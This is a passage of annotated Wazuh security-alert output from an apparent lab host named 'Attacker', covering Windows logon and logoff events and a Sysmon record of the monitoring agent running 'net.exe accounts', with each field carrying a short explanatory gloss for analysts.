Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.484358
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:17.3563661Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43766
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10720
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x25F285D Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x25f285d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:08.150+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.150+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.486825
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:17.3658372Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43767
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x25F1ED7 Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x25f1ed7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:08.365+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.365+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  48
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.489292
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:20.5246392Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43772
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:08.462+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.462+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  49
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.496628
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:24.4863616Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43774
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:09.029+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:09.029+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533929.503964
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:36:57.1322035Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  212225
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-17 16:36:57.031 ProcessGuid: {94294ddc-2e29-6801-dd07-000000000e00} ProcessId: 14844 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:36:57.031
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-2e29-6801-dd07-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

